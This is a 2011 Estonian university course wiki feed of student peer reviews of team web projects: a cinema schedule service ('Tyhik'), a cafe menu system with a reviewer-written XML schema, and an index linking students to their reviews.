ICO wiki - User contributions [en]

Talk:Meeskond "Tyhik"

2011-06-06T10:11:28Z

Tliiv: /* Kokkuvõttev arvustus */

<pre>
Arvustus

Meeskonna Tyhik loodud kinokavade xml faili struktuur on nõuetekohane, kenasti stiilis
<kinod>
<kino>
...
ning
<filmid>
<film>
...
Stiili- ja abifailid on olemas ning kui ma neid läbi vaatasin, siis vigu ei tuvastanud.
Lehe esialgne kujundus on hea, mulle meeldib.
Kokkuvõttes: minu arvates hea raam, millele veebirakendus ümber ehitada.

Indrek Tamm, meeskond Tool, 4.III.2011
</pre>

Võib öelda, et XML on väga põhjalik ja seal on kajastatud kõik andmed, mis kinokülastajale huvi võiksid pakkuda. Isiklikult ei leidnudki kohta, kus oleks tahtnud midagi teistmoodi teha. Sellise XML põhjal on kindlasti võimalik korralik teenus ja klientrakendus ehitada. Samuti on olemas skeemifail ja korralik XSLT, mis esitab andmeid vägagi loetaval ja ülevaatlikul kujul.

Siim Aaver, D21

Uurides XML, uurisin mis uurisin aga ei oska kohe midagi ette heita. XML fail tundub ilusti struktureeritud, ja paistab et on olemas ka kõik vajalikud asjad, mis kinosüsteemis peaksolemas olema. Kõik failid on korralikult loetaavad ja arusaamisega probleeme ei teki. Lihtne ülesehitus.

Jaak Lehtsalu D22

XML fail keskendub elementidele, struktuur on loogiline. Andmed hoitakse võimalikult detailselt, nii et midagi halba pole öelda. Skeemifailis on seatud elementidele vastavusse andmetüübid, mida neis hoitakse, korralik töö. Stiilifail mitte ainult ei loe lihtsalt XMLi elementide sisu vaid paneb need ka stiliseeritud tabelisse, mis parandab loetavust. Tore oleks tõesti sait, kust kerge kinodes toimuvast infot saada ning see on hea põhi sellise teenuse loomiseks.

Reigo Männiste D22

Väga põhjalik XML fail ning väga hästi ülesehitatud stiilifail. Kõik vajalik on olemas ning veel lisaks ka muudki.

Nimetused oleks võinud teistmoodi üles ehitada. Seal on olemas originaal ning tõlgitud filmi nimi, kuid sinna võiks olla võimalik lisada ka muid keeli. Kuigi kui rakendus jääbki ainult eesti keelseks siis pole vahet.

Jarko Kaskmaa D21

XML fail on ülesehituse poolest põhjalik. Nõuded on täidetud ja struktrueering paigas. Stiilifail samuti soliidne ja põhjalik. Etteheiteid puuduvad.

Indrek Kruuser

<pre>
Teenuse arvamus

Erinevaid teenuseid tundub olevat piisavalt palju, et antud veebiteenusele
saaks ehitada ühe korraliku ja kasuliku rakenduse.
Natuke tekitavad kahtlused näitkes võta hind, kustuta hind - mille jaoks neid vaja on?
Kui see käib mingi seansi kohta, siis võiks see olla näiteks filmi objekti küljes
koos teiste filmi parameetritega. Kui liiga palju meetoteid on, pole ka alati hea.
Aga samas, see on minu arvamus. Edu!

Taavi Ilves D21

----

Vastus:

Tegelikult saab filmi küsimise meetodile öelda, kas ta annab ka alamobjektid (hind, zanr, inimesed jne) või mitte.
Eraldi ongi sellepärast, et saaks küsida ainult filmi kohta infot. Pannes üheks parameetriks "true", siis pistetakse
hind filmi objekti külge. Samas on vaja hinda eraldi pärida näiteks kino hinnakirja genereerimiseks. Ning hindasid
peab saama eraldi ka kustutada, kuna hinnad ei ole ju jäigalt seotud filmiga vaid ikka kinoga.

Aga täname arvamuse eest :)

Kert Suvi D22

</pre>

Teenuse arvustus

Teenuseid on korralik hulk, kuid Eestikeelsed API nimed ei ole arusaadavad välismaalastele. Segadust tekitab veel "anna*" ja "võta*", kas mina annan talle ja ta võtab, või võtab tema ja annab mulle - nimi peaks ütleme kohe mis suunas liiklus käib. Tundub et mõned päringud saaks kokku ''mergeda'', näiteks annaFilmid ja annaFilmidNimi. Üldiselt aga on kena :)

-Tanel Liiv D22

Teenuse arvustus

Esimese asjana hakkas silma, et te olete iga päringu tüübi jaoks teinud eraldi teenuse. Minu arvates koodi loetavuse mõttes on see hea, aga teenust ennast oleks mugavam kasutada kui kõik meetodid oleks üheks teenuseks koondatud.
Üldiselt tundub, et teenusel on olemas kõikvõimalikud meetodid, mida vaja võiks minna. Positiivne on, et peaaegu kõigil meetoditel on olemas ka kirjeldus, et mida see teeb ning mis parameetreid vajab.
Projektiga võiksite .sln või vähemalt .csproj failid ka kaasa panna, et visual studios parem vaadata oleks ning käivitada saaks.

Siim Aaver D21

----

Vastus:

Üks põhjus, miks jagasime tükkideks oligi loetavus. Teine põhjus on see, et kui keegi peaks avaldama soovi rakenduse tegemiseks meie teenusele, siis saame anda ligipääsu ainult "AnnaTeenus"-ele. Kui keegi teeb lihtsalt kinokava kuvamise rakenduse, siis pole tal vaja ei lisamise ega kustutamise teenust/meetodeid näha.

Aga täname arvamuse eest :)

Kert Suvi D22

Teenuse arvustus

Wiki lehel on teenuse all välja toodud kõik meetodid, aga pole ühelegile meetodile juurde kirjutatud mida too teeb, aga mis on hea - kui lähtekoodi uurida siis seal on iga meetodi juures ära kirjeldatud, mida too teeb ja mida ta tagastab. Lisaks häirib kasutatud "estenglish" kasutamine lähtekoodis, st meetodi nimed on eesti keelsed. Üldiselt kood on loetav ja ilusti struktureeritud.

Toomas Soha D21

===Teenuse arvustus===

Nõuded teenuse osas on täidetud. Teenuste hulk on suur ja positiivne nähtus on koodi kommenteerimine. Struktrueering loogiliselt ülesehitatud. Teenuse osas etteheited puuduvad.

Indrek Kruuser

==Arvustus veebiteenuse klientidele==

Kuna viibin hetkel arvuti taga kus ma ei saa visual studiot kasutada siis ei saa nii täpset arvustust anda(nägin teie esitust klassis). Tahaks öelda mis häirib on see, et meetoid ja asjad on eestikeelsed. Rohkem oleksite võinud kommenteerida ka, kuigi esmapilgul tundus kõik suhteliselt arusaadav. Muidu on idee täitsa hea ja kindlasti seda täiendades saaks täiesti reaalselt kasutatava rakenduse ;)

Madis Sildaru D32

==Arvustus veebiteenuse klientidele==

Esitluse ajal tundus kõik kenasti töötavat. Adminipool funktsioneeris ja täitis nõutud nõuded. Disain ja kasutajamugavus oli arvestatav. Mina isklikult olin tulemtustega rahul.

Indrek Kruuser

Esiteks ei ole projektil kaasas solution faili, VS ei oska sortsuga ilma selleta midagi peale hakata. Kuna loen faile Notepad++'sis siis, virisen peaasjalikult sortsu kallal :)
*Sorts on eesti keeles :/
*Int32.Parse(Request.QueryString["id"]); stiilis asjad peaks olema try-catch ploki sees.
* Üldse kogu see data komplekteerimine on väga mitte OOP: kisute ühe andmestruktuuri lahti ja lisati tema objektid kõik eraldi teistesse objektidesse ning siis söödate need objektid alles kuvamise loogikasse. Võiks ju kohe (nt. film.inimesed) Repeaterisse sööta.
*Kinokava.aspx.cs: treppimine on vale
*Response.Redirect("Kinokava.aspx?id=" + id + "&paev=" + paev + "&kuu=" + kuu + "&aasta=" + aasta); selline URI ehitamine võiks näiteks eraldi meetod olla juba, niimoodi on inetu.
*Kommentaarid puuduvad koodis.

Need olid peamised möödalaskmised mis silma hakkasid. Suures pildis on kena :)

Tanel Liiv D22

===Veebiteenuse arvustus===

Kino teema on väga huvitav ja hea teema. Proovisin ka ise midagi sellist ühe teise aine raames teha.

Lisan siia, kuidas mulle meeldib koodi kirjutada (mitte mis valesti on):

Vähegi suurema projekti puhul ei kasutaks linq't, kuna ta genereerib palju tarbetud koodi. Kui ma ei eksi, siis teil on hetkel nii linq kui oma loodud klassid. Andmebaasist kustutamise arvelt saaks palju kokku hoida, kuna tegelikult on ju parem kui jääb kõik ajalugu alles. Filmi / kino saab lihtsalt märkida suletuks.
Mida suurem projekt, seda rohkem tuleb klasse nagunii, seega ma ei teeks igale suvalisele väärtusele klassi, vaid realiseeriks täpselt niipalju meetodeid, kui parasjagu tarvis läheb. Samuti, kui vähegi võimalik, koondaks ühe teema funktsioonid ühte klassi (n: select, insert, delete jne).

Kliendi pool oli lahedalt kujundatud ja ka repeaterite kasutamine oli hea mõte.
Ma kasutaks ka webUserControl elemente, siis ei peaks nii palju erinevaid lehti tegema ja saaks ka teinekord kasutada.

PS! Seda, ma tulin teie projekti hindama lootuses, et saan mõne hea kommenteerimis vihje aga...
ei saa öelda, et ma just palju kommentaare oleks leidnud :)

Priit Siimo

===Veebiteenuse arvustus===

Teenuse aluseks olev andmebaas on lihtne ja hea. Vajalikud lisaseosed on loodud. Teenuse meetodite hulk on suur ning see on mõistetav, kui tegu on nii rohkelt infot nõudva valdkonna käsitlusega. Kood teenuses on kommenteeritud ja meetodid ise võimalikult erinevates klassides. Lihtne lugeda ja mõista, mis kus asub. Hästi tehtud.

Reigo Männiste D22

===Klientrakenduse arvustus===

Esmalt kiidusõnad graafilise poole eest. Vaeva on nähtud lehe disainimisega ning seda on hea näha. Mõistmatuks jäi pordi määramise vajalikkus, ehk annab seda vähe rohkem selgitada. Lehe funktsionaalsus oli mulle meeltmööda ning funktsioonid töötasid kenasti. Oli üks katkine link... sitemap. Aga selge see, et rakenduse ja teenuse toimimise näitas tehtu kenasti ära. Rakenduse eesmärk igati täidetud ja hindeks annaksin 5 (pluss jääb ära katkise lingi tõttu).

Reigo Männiste D22

===Kokkuvõttev arvustus===

Meeskond valis hea teema. Kino infosüsteemi on kindlasti midagi, mida saaks ka reaalselt kasutada, muidugi kui kõik väga korralikult teha ning rakendust piisavalt siluda. Samas oleks võinud selle teema kohta alguses wikis ka natuke juttu olla, et millist lõpptulemust oodatakse, millise funktsionaalsusega ning mis rakendustega.

XML tehti igati korralikult nagu ka teenusekiht, kus kõik teemade kaupa ilusasti ära oli jagatud. Rakenduse puhul meeldis mulle välimus, mis jäi kohe positiivse asjan silma. On küll sees väiksemaid buge, kuid põhifunktsionaalsus paistab töötavat.

Meeskonna toimimise poole pealt on hea näha seda, et võeti kasutusele teises aines õpitud ekstreemprogrammeerimise praktika, et rakendust tõhusamalt ehitada. Lisaks tehti enamus asju ühiselt valmis, seega ilmselt kõik meeskonnaliikmeid panustasid korralikult lõpptulemusele.

Kui jätta välja teine klientrakendus, siis tundub, et kõik nõuded said täidetud, muidugi wiki oleks võinud natuke põhjalikum olla. Aga vaadates üldist projektide taset, siis igati korralik tulemus !

Rauno Rüga, D21

[[User:Rruga|Rruga]]

===Kokkuvõttev arvustus===

Kinokavade süsteem on väga huvitav valik. Wikis olev info maht on peaaegu sobiv - puudu jääb ehk vaid detailsemast süsteemiloogikast. Näiteks oleksin huvitatud lugemast täpsemalt kliendi andmevahetuse protokollist.

XML on üldiselt korralik, kuid wikis seisab punkt et süsteem toeta vaid ühte filmi, kas see on iganenud väide või on asi tõesti niimoodi? Mõlemad variandid ei ole eriti kiiduväärt. API on suures plaanis kena, küll aga ei meeldi see "võta" vs. "anna" nimede valik...API meetodite nimed peaks olema ikka nii iseenesestmõistetavad kui vähegi võimalik.

Meeskonnatöö tundub ka huvitav, punktide jaotus on kenasti lineaarne - hea et aus ollakse. Kuigi liikmeid oli piisavalt ei saadud siiski valmis teise klientrakendusega - võibolla sellepärast et punktide jaotusest tundub et arendajate arv oli projektis siiski väike ja nad lihtsalt ei jõudnud ise kõike valmis koodida.

Kurb oli ka kuulda et projekti arendamisel ei kasutatud versioonihaldust. See oleks olnud VÄGA vajalik kogemus kõikidele.

Need aga on väikesed möödalaskmised, üldiselt on normaalne projekt :)

PS! On tore näha et kasutati agiilseid arendusmeetodeid, eriti just paarisprogrammeerimist.

Tanel Liiv(D22)

===Kokkuvõttev arvustus===

Tehtud töö on täitnud ilusasti nõuded. Valikud realiseerimisel ja esitlemisel on tehtud targalt. Kood on kommenteeritud, see võimaldab tervikpilti kogulahendusest tunduvalt kiiremini luua kui mõne teise projekti puhul. Üldise välimusega võib rahule jääda ja suuremaid etteheiteid pole. Lõpptulemust annab rakendada ka tavaellu.

Indrek Kruuser

Talk:Meeskond "Hungry Student Food Board"

2011-06-06T10:02:20Z

Tliiv: /* Rakenduse arvustus */

== Arvustus XML-ile ==
XML on koostatud korrektselt. <br />
<br />Natuke "tähenärimist": 

* "kehtib" tagide asemel võiks olla "viimati ajakohastatud" ehk "updated" ja kui on plaanis tulevikus mitte eestikeelseid tegijaid ligi lasta, võiks kõik tag-id olla inglisekeelsed. Näiteks kui "konkureeriv firma" tahab ka neid andmeid mingil viisil oma klientidele kuvada. <br />

----

XML'i ennast on raske hinnata. Tuleks vaadata, kas XML vastab schemale ja kui vastab, siis hinnata schema faili, sest see on ülevaatlikum. Eraldi schema faili ei suutnud ma leida. Tegin siis ise ühe. <br />

* Schema visuaalselt <br />
[[File:HSFB schema.png]] <br />

* ning sellele vastav kood
<pre>
<?xml version="1.0" encoding="utf-8"?>
<xs:schema xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" attributeFormDefault="unqualified" elementFormDefault="qualified" xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name="kohvikud">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" name="kohvik">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" name="toit">
<xs:complexType>
<xs:sequence>
<xs:element name="pilt">
<xs:complexType>
<xs:sequence>
<xs:element name="url">
<xs:complexType>
<xs:simpleContent>
<xs:extension base="xs:string">
<xs:attribute name="width" type="xs:unsignedByte" use="required" />
<xs:attribute name="height" type="xs:unsignedByte" use="required" />
</xs:extension>
</xs:simpleContent>
</xs:complexType>
</xs:element>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="pealkiri" type="xs:string" />
<xs:element name="kirjeldus" type="xs:string" />
<xs:element name="poolhind">
<xs:complexType>
<xs:simpleContent>
<xs:extension base="xs:unsignedByte">
<xs:attribute name="valuuta" type="xs:string" use="required" />
<xs:attribute name="rate" type="xs:decimal" use="required" />
</xs:extension>
</xs:simpleContent>
</xs:complexType>
</xs:element>
<xs:element name="tervehind">
<xs:complexType>
<xs:simpleContent>
<xs:extension base="xs:unsignedShort">
<xs:attribute name="valuuta" type="xs:string" use="required" />
<xs:attribute name="rate" type="xs:decimal" use="required" />
</xs:extension>
</xs:simpleContent>
</xs:complexType>
</xs:element>
<xs:element name="allahindlus" type="xs:string" />
<xs:element name="kehtib" type="xs:string" />
<xs:element name="liked" type="xs:unsignedByte" />
</xs:sequence>
<xs:attribute name="tyyp" type="xs:string" use="required" />
</xs:complexType>
</xs:element>
</xs:sequence>
<xs:attribute name="name" type="xs:string" use="required" />
<xs:attribute name="staatus" type="xs:string" use="required" />
</xs:complexType>
</xs:element>
</xs:sequence>
</xs:complexType>
</xs:element>
</xs:schema>
</pre>

----

XML on kasutatav mitmete erinevate kohvikute puhul. Pisut arusaamatu on staatus tagide olemasolu, kas mõeldud on ka mittetegutsevate kohvikute andmete kuvamist? XML-i loojad on ette näinud erinevate suurustega portsjonite pakkumise võimaluse. Samuti on olemas otse XML-is viide pakutava toote fotole. Olemas on ka võimalus kasutaja poolse tagasiside, hinnete kujul, edastamiseks. Kehtib silt oletan, et on mõeldud näitamaks millal infot viimati uuendati.

--[[User:Htamm|Htamm]] 23:13, 20 March 2011 (EET)

----
Heiki

Tänud sulle korraliku tagasiside eest. Staatus on mõeldud kohvikule "tweetimiseks" nt päevapakkumine või miski muu random info kuvamiseks. Süsteem on tõepoolest mõeldud mitmele kohvikule, mitte ühe tarkvara asendamine ühele kohvikule. Esialgne programm on tõepoolest mõeldud Eesti turule, Internatsionaliseerimist peaks tõepoolest algusest saadik programmi sisse planeerima, kuid esialgu ei näe, et meie kohvikute toode müüki läheks, kuid rakendame seda põhimõtet meie firmas.

Jaan Kruusma
----

= ''Arvustus veebitenusele'' =
----------------------
Teenus on põhjalikult ja korralikult tehtud. Olulist rolli mängib ka disain, mis on ilusti tehtud ja mis mulle meeldis.  Meetodid on kirjeldatud ja andmediagrammis on hästi nähtud, mis millest sõltub. Wikis veebiteenus on lisatud mitte ainult kirjeldamisega, kui ka piltidega, mis annab täeliku ülevaate.

Jana Mrots

== Rakenduse arvustus ==

Esimese positiivse asjana võib kohe välja tuua selle, et on kasutatud MVC3 raamistikku. Kuid wiki lehel polnud olemas juhiseid, kuidas rakendus tööle saada. Otsisin siis MVC3 allalaadimise koha ülesse ja paigaldasin selle ka enda arvutisse.

Kui rääkida sellest, mis puudu siis koodis ei märganud ma kuskil kommentaare. Ilma dokumentatsioonita on raske koodist kiire ülevaade saada. Kuna varem ei ole MVC3-ga kokku puutunud, siis ei saanud koodist suurt midagi aru.

Panin siis rakenduse käima. Tuli ette "häda ja viletsuse mula-tekst" (''Lorem Ipsum dolor sit amet ...''). Registreerisin ennast lehel ära, mille järel olin kohe lehele sisse logitud (üleval paremal oli kiri "''Welcome, Ilmar!''"). Siis vajutasin menüüribal "Cafes", mille peale tuli ''Compilation Error''

Source File: c:\Users\iLmar\Documents\Visual Studio 2010\Projects\HSFB\HSFB\Views\Cafe\Index.cshtml Line: 91

[[File:HSFB error.JPG|800px|Vajutasin menüüribal "Cafes", mille peale tuli Compilation Error.]]

Küsisin skype-i VR2 grupis, kuidas menüüsid näha saaks. Tänaseks ei saanudki abi.

'''Vastus: Compilation error probleem on elimineeritud. Lorem Ipsum on väga tore :)'''

[[User:Itelga|Ilmar Telga]] 17:05, 21 May 2011 (EEST)

== Rakenduse arvustus ==

Eriti meeldis see toodetekuvamise rakendus. Seal võiks veel juures olla see, et kui seda kuvada suuremale ekraanile siis on toidud kahes tulbas.
Desktopi rakendususe puhul võika aint õelda, et võibolla on kassapidaja jaoks seal ka mitte tarviliku infot nagu ID'd mis teda ilmselt tegelt ei huvita. Kuid oma eesmärgi milleks oli kirjete kustutamine ja hindade muutmine ta täidab.
Facebooki api's võiks veel olla kohviku enda asukoha kohta midagi näidatud ja millal lahti. Muidu oli hea et midagi üleliigset seal ei olnud.

Siim Sarv

=== Kokkuvõttev arvustus ===

Väga positiivne hinnang kogu meeskonnale. Hea näha, et ilmselt kõik meeskonnaliikmeid panustasid korralikult lõpptulemusele.
Tööd olid alati esitatud õigeaegselt, esitlus selge ja korralik. Teema oli küll laialt levinud ja paljude poolt valitud, kuid teostus arvatavasti parim.

MVC 3 kasutamine on hea mõte, eriti just suuremate ja mahukamate projektide puhul.
Rakenduse puhul meeldis profesionaalne välimus (eriti admin liidesel) ja erinevad lisad nagu facebooki kasutamine.

Hea töö!

Arvustas,
Priit Siimo

Võrgurakendused II: 2011 kevadel valminud kodutööd

2011-06-06T08:19:05Z

Tliiv: /* Tanel Liiv */

=Jaan Igamees=
* Meeskond [[Meeskond "FoodWars"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Kert Suvi=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond Tool]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Helen Muidik=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "GAP"]]
** Arvustus veebiteenusele [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Tact"]]
** Arvustus projektile kokkuvõtvalt

=Mihkel Sokk=
* Meeskond [[Meeskond "Tact"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Sepad"]]
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Sepad"]]
** Arvustus projektile kokkuvõtvalt

=Seda Sahradyan=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tact"]]
** Arvustus veebiteenusele [[Talk:Meeskond "GAP"]]
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond "Nämm-nämm"]]

=Priit Siimo=
* Meeskond [[Meeskond "GAP"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond Tool]]
** Arvustus veebiteenusele [[Talk:Meeskond_%22Tyhik%22]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_%22Tyhik%22]]
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond_%22Hungry_Student_Food_Board%22]]

=Siim Sarv=
* Meeskond [[Meeskond "C terav"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "FoodWars"]]
** Arvustus veebiteenusele [[Talk:Meeskond "FoodWars"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Hungry Student Food Board"]]
** Arvustus projektile kokkuvõtvalt

=Reigo Männiste=
* Meeskond [[Meeskond Tool]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Karl Männil=
* Meeskond [[Meeskond "Sepad"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "H2"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Ilmar Telga=
* Meeskond [[Meeskond "FoodWars"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "GAP"]]
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Hungry Student Food Board"]]
** Arvustus projektile kokkuvõtvalt

=Siim Aaver=
* Meeskond [[Meeskond "Nämm-nämm"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "H2"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Taavi Ilves=
* Meeskond [[Meeskond "Hungry_Student_Food_Board"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "ASP-tastic"]]
** Arvustus veebiteenusele [[Talk:Meeskond_"Tyhik"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_"Tact"]]
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond_Tool]]

=Jaan Kruusma=
* Meeskond [[Meeskond "Hungry_Student_Food_Board"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Andrus Reedla=
* Meeskond [[Meeskond "GAP"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond "Nämm-nämm"]]

=Jaak Lehtsalu=
* Meeskond [[Meeskond "Tact"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "H2"]]
** Arvustus projektile kokkuvõtvalt

=Jana Mrots=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tact"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Hungry Student Food Board"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "H2"]]
** Arvustus projektile kokkuvõtvalt

=Heiki Tamm=
* Meeskond [[Meeskond "H2"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Meeskond"]]
** Arvustus XML failile [[Talk:Meeskond "Hungry Student Food Board"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Toomas Soha=
* Meeskond [[Meeskond "Sepad"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenusele [[Talk:Meeskond_%22Tyhik%22]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_%22C_terav%22]]
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond_%22Tact%22]]

=Miina Sikk=
* Meeskond [[Meeskond Tool]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tact"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Rauno Rüga=
* Meeskond [[Meeskond "FoodWars"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond Tool]]
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond "Tyhik"]]

=Tanel Liiv=
* Meeskond [[Meeskond "Hungry Student Food Board"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Tyhik"]]
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond "Tyhik"]]

=Gaspar Karm=
* Meeskond [[Meeskond "GAP"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "FoodWars"]]
** Arvustus veebiteenusele [[Talk:Meeskond "FoodWars"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "FoodWars"]]
** Arvustus projektile kokkuvõtvalt

=Joosep Ilves=
* Meeskond [[Meeskond "Nämm-nämm"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond "H2"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_"FoodWars"]]
** Arvustus projektile kokkuvõtvalt

=Taivo Türnpu=
* Meeskond [[Meeskond "ASP-tastic"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond Tool]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Sander Baikov=
* Meeskond [[Meeskond "Sepad"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "ASP-tastic"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Allar Anijago=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tool"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Madis Sarv=
* Meeskond [[Meeskond "C terav"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_Tool]]
** Arvustus projektile kokkuvõtvalt

=Kaspar Kallasmaa=
* Meeskond [[Meeskond "Nämm-nämm"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Jarko Kaskmaa=
* Meeskond [[Meeskond "ASP-tastic"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenusele [[Talk:Meeskond_%22H2%22]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_%22H2%22]]
** Arvustus projektile kokkuvõtvalt

=Lauri Kermas=
* Meeskond [[Meeskond "FoodWars"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "C terav"]]
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond "C terav"]]

=Indrek Kõue=
* Meeskond [[Meeskond "ASP-tastic"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "GAP"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Erik Kaju=
* Meeskond [[Meeskond Tool]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond ""]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Mailis Toompuu=
* Meeskond [[Meeskond "H2"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Sepad"]]
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond Tool]]
** Arvustus projektile kokkuvõtvalt

=Madis Kõosaar=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Sepad"]]
** Arvustus projektile kokkuvõtvalt

=Gert Glükmann=
* Meeskond [[Meeskond "Nämm-nämm"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "ASP-tastic"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Martin Lensment=
* Meeskond [[Meeskond "Tact"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond_"FoodWars"]] ja [[Talk:Meeskond_Tool]]
** Arvustus veebiteenusele [[Talk:Meeskond_Tool]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_"H2"]]
** Arvustus projektile kokkuvõtvalt

=Madis Sildaru=
* Meeskond [[Meeskond "Sepad"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond_Tool]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Tyhik"]]
** Arvustus projektile kokkuvõtvalt

=Indrek Kruuser=
* Meeskond [[Meeskond "Hungry Student Food Board"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Tyhik"]]
